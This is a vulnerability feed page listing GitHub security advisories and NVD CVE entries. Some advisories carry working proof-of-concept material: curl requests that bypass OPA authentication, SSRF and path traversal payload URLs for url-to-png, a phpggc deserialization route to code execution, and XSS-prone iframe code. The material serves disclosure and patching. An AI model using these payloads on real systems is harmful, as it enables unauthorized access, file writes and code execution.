Most recent vulnerabilities by source

The vulnerabilities are sorted by update time (recent to old)

Vulnerability ID Description
ghsa-pq87-626r-6v4p (github) Directory Traversal vulnerability in xmind2testcase v.1.5 allows a remote attacker to execute arbitrary code via the webtool\application.py component.
ghsa-fg5m-8jp9-9hv7 (github) A potential security vulnerability has been identified in certain HP PC products using AMI BIOS, which might allow arbitrary code execution. AMI has released firmware updates to mitigate this vulnerability.
ghsa-9g6g-xqv5-8g5w (github) A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation.
ghsa-5f5c-8rvc-j8wf (github) ### Summary HTTP `OPTIONS` requests are always allowed by `OpaMiddleware`, even when they lack authentication, and are passed through directly to the application. The maintainer uncertain whether this should be classed as a "bug" or "security issue" – but is erring on the side of "security issue" as an application could reasonably assume OPA controls apply to *all* HTTP methods, and it bypasses more sophisticated policies. ### Details `OpaMiddleware` allows all HTTP `OPTIONS` requests without evaluating it against any policy: https://github.com/busykoala/fastapi-opa/blob/6dd6f8c87e908fe080784a74707f016f1422b58a/fastapi_opa/opa/opa_middleware.py#L79-L80 If an application provides different responses to HTTP `OPTIONS` requests based on an entity existing (such as to indicate whether an entity is writable on a system level), an unauthenticated attacker could discover which entities exist within an application (CWE-204). ### PoC This toy application is based on the behaviour of an app[^1] which can use `fastapi-opa`. The app uses the `Allow` header of a HTTP `OPTIONS` to indicate whether an entity is writable on a "system" level, and returns HTTP 404 for unknown entities: [^1]: an open source app, not written by me ```python # Run with: fastapi dev opa-poc.py --port 9999 from fastapi import FastAPI, Response, HTTPException from fastapi_opa import OPAConfig, OPAMiddleware from fastapi_opa.auth.auth_api_key import APIKeyAuthentication, APIKeyConfig # OPA doesn't actually need to be running for this example opa_host = "http://localhost:8181" api_key_config = APIKeyConfig( header_key = 'ApiKey', api_key = 'secret-key', ) api_key_auth = APIKeyAuthentication(api_key_config) opa_config = OPAConfig(authentication=api_key_auth, opa_host=opa_host) app = FastAPI() app.add_middleware(OPAMiddleware, config=opa_config) WRITABLE_ITEMS = { 1: True, 2: False, } @app.get("/") async def root() -> dict: return {"msg": "success"} @app.get("/items/{item_id}") async def read_item(item_id: int): if item_id not in WRITABLE_ITEMS: raise HTTPException(status_code=404) return {"item_id": item_id} @app.options("/items/{item_id}") async def read_item_options(response: Response, item_id: int) -> dict: if item_id not in WRITABLE_ITEMS: raise HTTPException(status_code=404) response.headers["Allow"] = "OPTIONS, GET" + (", POST" if WRITABLE_ITEMS[item_id] else "") return {} ``` As expected, HTTP `GET` requests fail consistently when unauthenticated, regardless of whether the entity exists, because `read_item()` is never executed: ``` $ curl -i 'http://localhost:9999/items/1' HTTP/1.1 401 Unauthorized server: uvicorn content-length: 26 content-type: application/json {"message":"Unauthorized"} $ curl -i 'http://localhost:9999/items/3' HTTP/1.1 401 Unauthorized server: uvicorn content-length: 26 content-type: application/json {"message":"Unauthorized"} ``` However, HTTP `OPTIONS` requests are never authenticated by `OpaMiddleware`, so are passed straight through to `read_item_options()` and returned to unauthenticated users: ``` $ curl -i -X OPTIONS 'http://localhost:9999/items/1' HTTP/1.1 200 OK server: uvicorn content-length: 2 content-type: application/json allow: OPTIONS, GET, POST {} $ curl -i -X OPTIONS 'http://localhost:9999/items/2' HTTP/1.1 200 OK server: uvicorn content-length: 2 content-type: application/json allow: OPTIONS, GET {} $ curl -i -X OPTIONS 'http://localhost:9999/items/3' HTTP/1.1 404 Not Found server: uvicorn content-length: 22 content-type: application/json {"detail":"Not Found"} ``` ### Versions ``` fastapi-opa==2.0.0 fastapi==0.111.0 ```
ghsa-fg86-4c2r-7wxw (github) ### Summary In `torrentpier/library/includes/functions.php`, `get_tracks()` uses the unsafe native PHP serialization format to deserialize user-controlled cookies: https://github.com/torrentpier/torrentpier/blob/84f6c9f4a081d9ffff4c233098758280304bf50f/library/includes/functions.php#L41-L60 ### PoC One can use [`phpggc`](https://github.com/ambionics/phpggc/) and the chain `Guzzle/FW1` to write PHP code to an arbitrary file, and execute commands on the system. For instance, the cookie `bb_t` will be deserialized when browsing to `viewforum.php`.
ghsa-342q-2mc2-5gmp (github) ### Summary The maintainer been contemplating whether FTP or other protocols could serve as useful functionalities, but there may not be a practical reason for it since we are utilizing headless Chrome to capture screenshots. The argument is based on the assumption that this package can function as a service. The package includes an `ALLOW_LIST` where the host can specify which services the user is permitted to capture screenshots of. By default, capturing screenshots of web services running on localhost, 127.0.0.1, or the [::] is allowed. The maintainer is of the opinion that the package should also have a blacklist due to a potential vulnerability (or rather design oversight). If someone hosts this on a server, users could then capture screenshots of other web services running locally. Unless this is strictly for web pages. Something similar here: https://github.com/follow-redirects/follow-redirects/issues/235 (localhost is intended for end users or hosts to deny, and the package is for HTTP/HTTPS.) This is marked as a `LOW` since the maintainer is not sure if this is a vulnerability, but it's still best to highlight it. :) ### PoC Have a service like so running locally: ```js const http = require("http") const server = http.createServer((req, res) => { console.log("Received headers:", req.headers) res.writeHead(200, { "Content-Type": "text/plain" }) res.end("Something private! But Hello from Server 2 :)") }) server.listen(3001, () => { console.log("Server two running on http://localhost:3001") }) ``` Run the package in dev mode, `pnpm dev`. Feed these URLs: ``` http://localhost:3089/?url=http://[::]:3001&width=4000 http://localhost:3089/?url=http://localhost:3001&width=4000 http://localhost:3089/?url=http://127.0.01:3001&width=4000 ``` <img width="622" alt="image" src="https://github.com/jasonraimondi/url-to-png/assets/42532003/21f1c883-ba00-4a15-83b8-922484fa4c2b"> ### Impact Disclose internal web services?
ghsa-vvmv-wrvp-9gjr (github) ### Summary When trying to add a `BLOCK_LIST` feature when the maintainer noticed they didn't sanitize the `ImageId` in the code, which leads to path traversal vulnerability. Now, this is different from a traditional path traversal issue, because as of NOW you can store the image in any place arbitrarily, and given enough time they might be able to come up with a working exploit BUT for the time being they am reporting this. ### Details @jmondi/url-to-png does not sanitizing the `ImageID` as in not removing special chars from the params [(extract_query_params.ts#l75)](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75) ```js const imageId = dateString + "." + slugify(validData.url) +configToString(params); ``` This when fed to other parts of the code such as ([filesystem.ts#L34](https://github.com/jasonraimondi/url-to-png/blob/8afc00247c1d7e6c7b37356a5f6282b486e596fa/src/lib/storage/filesystem.ts#L34)) ```js return path.join(this.storagePath, imageId) + ".png"; ``` Would result in path traversal issue. ### PoC ``` # Configuration for filesystem storage provider (optional) STORAGE_PROVIDER=filesystem IMAGE_STORAGE_PATH=poc ``` Set this in your `.env` file and use this as your payload. ``` http://localhost:3089/?url=http://example.com&width=400&isDarkMode=../../../../../../../../../../../../tmp/hack ``` This will create a `.png` file in the `/tmp` section of the system. Loom POC: https://www.loom.com/share/bd7b306cdae7445c97e68f0626e743a6 This is valid for pretty much all the arguments (except for numeric values) A simple fix would be to use the `slugify` for the params as well like so ([#L75](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75)) ```diff - const imageId = dateString + "." + slugify(validData.url) + configToString(params); + const imageId = dateString + "." + slugify(validData.url) + slugify(configToString(params)); ``` ### Impact This would be path traversal vulnerability which allows arbitrary write as of now.
ghsa-875x-g8p7-5w27 (github) ### Summary The ProfileBasedRequestOptionsBuilder method returns allowedCredentials without any credentials if no username was found. ### Details When WebAuthn is used as the first or only authentication method, an attacker can enumerate usernames based on the absence of the `allowedCredentials` property in the assertion options response. This allows enumeration of valid or invalid usernames. #### Proposal how to resolve it: ``` return $this->publicKeyCredentialRequestOptionsFactory->create( $this->profile, count($allowedCredentials) <= 0 ? self::getRandomCredentials(): $allowedCredentials, $optionsRequest->userVerification, $extensions ); private static function getRandomCredentials(): array { $credentialSources = []; for ($i = 0; $i <= rand(0,1); $i++) { $credentialSources[] = new PublicKeyCredentialSource( random_bytes(32), "public-key", [], "basic", new EmptyTrustPath(), Uuid::v7(), random_bytes(77), Uuid::v7()->__toString(), rand(0, 6000), null ); } return array_map( static fn (PublicKeyCredentialSource $credential): PublicKeyCredentialDescriptor => $credential->getPublicKeyCredentialDescriptor(), $credentialSources ); } ``` ### PoC curl https://example.com/assertion/options \ -H 'content-type: application/json' \ --data-raw '{"username":"NotMeRandomUsername123"}' ### Impact By knowing which usernames are valid, attackers can focus their efforts on a smaller set of potential targets, increasing the efficiency and likelihood of successful attacks.
ghsa-h3pq-667x-r789 (github) ### Impact Editors that use `MediaEmbedElement` and pass custom `urlParsers` to the `useMediaState` hook may be vulnerable to XSS if a custom parser allows `javascript:`, `data:` or `vbscript:` URLs to be embedded. Editors that do not use `urlParsers` and instead consume the `url` property directly may also be vulnerable if the URL is not sanitised. The default parsers `parseTwitterUrl` and `parseVideoUrl` are not affected. Examples of vulnerable code: ```tsx const { embed } = useMediaState({ urlParsers: [ // Custom parser that does not use an allowlist or validate the URL protocol (url) => ({ url }), ], }); return ( <iframe src={embed!.url} // ... /> ); ``` ```tsx const { url } = useMediaState(); return ( <iframe // url property used directly from useMediaState() with no sanitisation src={url} // ... /> ); ``` ```tsx const { url } = element; return ( <iframe // url property used directly from element with no sanitisation src={url} // ... /> ); ``` ### Patches `@udecode/plate-media` 36.0.10 resolves this issue by only allowing HTTP and HTTPS URLs during parsing. This affects only the `embed` property returned from `useMediaState`. In addition, the `url` property returned from `useMediaState` has been renamed to `unsafeUrl` to indicate that it has not been sanitised. The `url` property on `element` is also unsafe, but has not been renamed. If you're using either of these properties directly, you will still need to validate the URL yourself. ### Workarounds Ensure that any custom `urlParsers` do not allow `javascript:`, `data:` or `vbscript:` URLs to be returned in the `url` property of their return values. If `url` is consumed directly, validate the URL protocol before passing it to the `iframe` element. ### References How to verify the protocol of a URL: https://stackoverflow.com/a/43467144
ghsa-pqwr-82gc-57c6 (github) An SMM callout vulnerability was discovered in Supermicro X11DPH-T, X11DPH-Tq, and X11DPH-i motherboards with BIOS firmware before 4.4.
ghsa-78hx-gp6g-7mj6 (github) Using crafted public RSA keys which are not compliant with SP 800-56B can cause a small memory leak when encrypting and verifying payloads. An attacker can leverage this flaw to gradually erode available memory to the point where the host crashes for lack of resources. Upon restart the attacker would have to begin again, but nevertheless there is the potential to deny service.
ghsa-6r36-7xvw-24wh (github) An authenticated stored cross-site scripting (XSS) exists in the TP-Link TL-SG1016DE affecting version TL-SG1016DE(UN) V7.6_1.0.0 Build 20230616, which could allow an adversary to run JavaScript in an administrator's browser. This issue was fixed in TL-SG1016DE(UN) V7_1.0.1 Build 20240628.
ghsa-w485-2xv8-4q48 (github) An arbitrary memory write vulnerability was discovered in Supermicro X11DPH-T, X11DPH-Tq, and X11DPH-i motherboards with BIOS firmware before 4.4.
ghsa-vm7h-gxx5-wrm7 (github) Use-after-free vulnerability in the fz_subsample_pixmap function in fitz/pixmap.c in Artifex Software, Inc. MuPDF 1.10a allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted document.
ghsa-qqxw-wjc4-f4pj (github) An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.25, 4.4.0 through 4.7.5, and 4.8.0. Certain manipulations allow restarting in single-user mode despite the activation of secure boot. The following versions fix this: 4.3.27, 4.7.6, and 4.8.1.
ghsa-qhpv-2vqr-f66v (github) An arbitrary memory write vulnerability was discovered in Supermicro X11DPG-HGX2, X11PDG-QT, X11PDG-OT, and X11PDG-SN motherboards with BIOS firmware before 4.4.
ghsa-mv25-m6g9-hcg7 (github) In MuPDF 1.12.0 and earlier, multiple heap use after free bugs in the PDF parser could allow an attacker to execute arbitrary code, read memory, or cause a denial of service via a crafted file.
ghsa-m49c-46jg-fj9c (github) A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in functon fz_new_pixmap_from_float_data() of pixmap.c.
ghsa-jx4w-rh76-5j93 (github) eLinkSmart Hidden Smart Cabinet Lock 2024-05-22 has Incorrect Access Control and fails to perform an authorization check which can lead to card duplication and other attacks.
ghsa-cqwp-8vf4-jg4p (github) In MuPDF 1.12.0 and earlier, multiple memory leaks in the PDF parser allow an attacker to cause a denial of service (memory leak) via a crafted file.
ghsa-c9gq-c7g6-cr8x (github) In MuPDF 1.12.0 and earlier, multiple reachable assertions in the PDF parser allow an attacker to cause a denial of service (assert crash) via a crafted file.
ghsa-c4gp-6356-63vc (github) In MuPDF 1.12.0 and earlier, multiple use of uninitialized value bugs in the PDF parser could allow an attacker to cause a denial of service (crash) or influence program flow via a crafted file.
ghsa-96mj-rvf6-68f7 (github) In MuPDF 1.12.0 and earlier, a stack buffer overflow in function pdf_lookup_cmap_full in pdf/pdf-cmap.c could allow an attacker to execute arbitrary code via a crafted file.
ghsa-6f83-xgr8-j9pf (github) An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.41, 3.10.0 through 3.11.29, 4.0 through 4.3.24, and 4.4.0 through 4.7.4. A user who has access to the SNS with write access on the email alerts page has the ability to create alert email containing malicious JavaScript, executed by the template preview. The following versions fix this: 3.7.42, 3.11.30, 4.3.25, and 4.7.5.
ghsa-w7rc-rwvf-8q5r (github) ### Impact Node Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure. For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing. ### Patches We released patched versions for both stable and beta channels: - For `v2`: 2.6.1 - For `v3`: 3.0.0-beta.9 ### Workarounds None, it is strongly recommended to update as soon as possible. ### For more information If you have any questions or comments about this advisory: * Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=&labels=question&template=support-or-usage.md&title=Question%3A+) * Contact one of the core maintainers.
ghsa-5xgj-pmjj-gw49 (github) RISC Zero zkVM was designed from its inception to provide three main guarantees: 1. *Computational integrity*: that a given software program executed correctly. 2. *Succinctness*: that the proof of execution does not grow in relation to the program being executed. 3. *Zero Knowledge*: that details of the program execution are not visible within the proof of program execution. Ulrich Habock and Al Kindi have released [new research] that indicates that several STARK implementations -including our RISC Zero zkVM- do not meet the requirements to assert the specific property of zero knowledge provably. While a vast majority of real-world applications that leverage RISC Zero zkVM or similar systems depend primarily on computational integrity and succinctness, a subset of applications critically depend on the privacy guarantees provided by zero-knowledge; and for those use cases, users are cautioned to understand the research and make informed decisions based on the risks outlined in using an impacted system. Although the maintainers are not aware of any attacks that can take advantage of this potential weakness, they are working to proactively address this discovery as quickly as possible. [new research]: https://eprint.iacr.org/2024/1037
ghsa-wjcg-c99p-6q65 (github) A vulnerability in /goform/SetVirtualServerCfg in the sub_6320C function in Tenda AX1806 1.0.0.1 firmware leads to stack-based buffer overflow.
ghsa-j5r4-872p-2x9r (github) Path traversal in Team Chat for some Zoom Workplace Apps and SDKs for Windows may allow an authenticated user to conduct information disclosure via network access.
ghsa-73g9-pvg4-g265 (github) A vulnerability in /goform/SetStaticRouteCfg in the sub_519F4 function in Tenda AX1806 1.0.0.1 firmware leads to stack-based buffer overflow.
ghsa-3x52-fw35-w3mf (github) Race condition in the installer for Zoom Workplace App for Windows and Zoom Rooms App for Windows may allow an authenticated user to conduct a denial of service via local access.
Vulnerability ID CVSS Base Score Description Vendor Product Publish Date Last Update Date
cve-2024-6780 (NVD) N/A Improper permission control in the mobile application (com.android.server.telecom) may lead to user information security risks. TECNO
com.android.server.telecom
2024-07-16T01:51:03.278Z 2024-07-16T01:51:03.278Z
cve-2024-23450 (NVD) CVSS-v3.1: 4.9 Elasticsearch Uncontrolled Resource Consumption vulnerability Elastic
Elasticsearch
2024-03-27T17:03:48.290Z 2024-07-16T01:36:29.040Z
cve-2023-51456 (NVD) CVSS-v3.1: 6.8 A Improper Input Validation issue affecting the v2_sdk_service running on a set of DJI drone devices on the port 10000 could allow an attacker to trigger an out-of-bound read/write into the process memory through a crafted payload due to a missing input sanity check in the v2_pack_array_to_msg function implemented in the libv2_sdk.so library imported by the v2_sdk_service binary implementing the service, potentially leading to a memory information leak or an arbitrary code execution. Affected models are Mavic 3 Pro until v01.01.0300, Mavic 3 until v01.00.1200, Mavic 3 Classic until v01.00.0500, Mavic 3 Enterprise until v07.01.10.03, Matrice 300 until v57.00.01.00, Matrice M30 until v07.01.0022 and Mini 3 Pro until v01.00.0620. DJI
DJI
DJI
DJI
DJI
DJI
DJI
Mavic 3 Pro
Mavic 3
Mavic 3 Classic
Mavic 3 Enterprise
Matrice 300
Matrice M30
Mini 3 Pro
2024-04-02T10:31:30.487Z 2024-07-16T01:33:28.641Z
cve-2022-4259 (NVD) CVSS-v3.1: 8.8 CVSS-v4.0: 8.7 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 Nozomi Networks
Nozomi Networks
CMC
Guardian
2023-05-04T10:38:25.076Z 2024-07-16T01:23:33.120Z
cve-2023-28303 (NVD) CVSS-v3.1: 3.3 Windows Snipping Tool Information Disclosure Vulnerability Microsoft
Microsoft
Snipping Tool
Snip & Sketch for Windows 10
2023-06-13T16:24:46.551Z 2024-07-16T01:21:00.759Z
cve-2023-29366 (NVD) CVSS-v3.1: 7.8 Windows Geolocation Service Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows Server 2022
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
2023-06-13T23:26:07.906Z 2024-07-16T01:20:30.137Z
cve-2023-24937 (NVD) CVSS-v3.1: 6.5 Windows CryptoAPI Denial of Service Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
2023-06-14T02:05:49.908Z 2024-07-16T01:19:46.303Z
cve-2023-32030 (NVD) CVSS-v3.1: 7.5 .NET and Visual Studio Denial of Service Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft .NET Framework 4.8
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 3.5 and 4.6.2
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5.1
2023-06-14T14:52:41.272Z 2024-07-16T01:19:11.009Z
cve-2023-35131 (NVD) CVSS-v3.1: 6.1 Moodle: xss risk on groups page

2023-06-22T00:00:00 2024-07-16T01:18:07.781Z
cve-2022-29147 (NVD) CVSS-v3.1: 3.1 Microsoft Edge (Chromium-based) Spoofing Vulnerability Microsoft
Microsoft Edge (Chromium-based)
2023-06-29T00:48:37.583Z 2024-07-16T01:16:57.162Z
cve-2023-21756 (NVD) CVSS-v3.1: 7.8 Windows Win32k Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-07-11T17:02:15.549Z 2024-07-16T01:16:23.998Z
cve-2023-32035 (NVD) CVSS-v3.1: 6.5 Remote Procedure Call Runtime Denial of Service Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 Service Pack 2 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-07-11T17:02:26.139Z 2024-07-16T01:15:50.970Z
cve-2023-22378 (NVD) CVSS-v3.1: 7.1 CVSS-v4.0: 7.1 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 Nozomi Networks
Nozomi Networks
Guardian
CMC
2023-08-09T08:01:57.279Z 2024-07-16T01:14:53.069Z
cve-2023-3495 (NVD) CVSS-v3.1: 7.8 Out-of-bounds Write Vulnerability in Hitachi EH-VIEW (KeypadDesigner) Hitachi
EH-VIEW
2023-08-23T01:32:12.229Z 2024-07-16T01:13:52.317Z
cve-2023-28557 (NVD) CVSS-v3.1: 7.8 Improper Validation of Array Index in WLAN HAL Qualcomm, Inc.
Snapdragon
2023-09-05T06:24:12.673Z 2024-07-16T01:11:17.769Z
cve-2023-28286 (NVD) CVSS-v3.1: 6.1 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability Microsoft
Microsoft
Microsoft Edge (Chromium-based)
Microsoft Edge (Chromium-based) Extended Stable
2023-04-27T18:34:08.500Z 2024-07-16T01:08:24.272Z
cve-2023-28261 (NVD) CVSS-v3.1: 5.7 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft Edge (Chromium-based) Extended Stable
Microsoft Edge (Chromium-based)
2023-04-27T18:33:43.121Z 2024-07-16T01:08:24.808Z
cve-2023-24892 (NVD) CVSS-v3.1: 8.2 Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability Microsoft
Microsoft Edge (Chromium-based)
2023-03-14T16:56:00.409Z 2024-07-16T01:08:23.757Z
cve-2023-24890 (NVD) CVSS-v3.1: 6.5 Microsoft OneDrive for iOS Security Feature Bypass Vulnerability Microsoft
OneDrive for iOS
2023-03-14T16:55:59.921Z 2024-07-16T01:08:23.210Z
cve-2023-24880 (NVD) CVSS-v3.1: 4.4 Windows SmartScreen Security Feature Bypass Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
2023-03-14T16:55:59.434Z 2024-07-16T01:08:22.662Z
cve-2023-24876 (NVD) CVSS-v3.1: 8.8 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:58.928Z 2024-07-16T01:08:22.058Z
cve-2023-24913 (NVD) CVSS-v3.1: 8.8 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:58.427Z 2024-07-16T01:08:21.482Z
cve-2023-24872 (NVD) CVSS-v3.1: 8.8 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:57.927Z 2024-07-16T01:08:20.916Z
cve-2023-24871 (NVD) CVSS-v3.1: 8.8 Windows Bluetooth Service Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
2023-03-14T16:55:57.416Z 2024-07-16T01:08:20.364Z
cve-2023-24911 (NVD) CVSS-v3.1: 4.3 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:56.908Z 2024-07-16T01:08:19.795Z
cve-2023-24870 (NVD) CVSS-v3.1: 6.5 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
2023-03-14T16:55:56.399Z 2024-07-16T01:08:19.259Z
cve-2023-24910 (NVD) CVSS-v3.1: 7.8 Windows Graphics Component Elevation of Privilege Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
Windows 10 Version 1507
Windows 10 Version 1607
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 Service Pack 2 (Server Core installation)
Windows Server 2008 Service Pack 2
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Microsoft Office 2019 for Mac
Microsoft Office LTSC for Mac 2021
Microsoft Office for Android
Microsoft Office for Universal
2023-03-14T16:55:55.876Z 2024-07-16T01:08:18.761Z
cve-2023-24909 (NVD) CVSS-v3.1: 8.8 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Microsoft
Windows 10 Version 1809
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows 10 Version 20H2
Windows 11 version 21H2
Windows 10 Version 21H2
Windows 11 version 22H2
Windows 10 Version 22H2
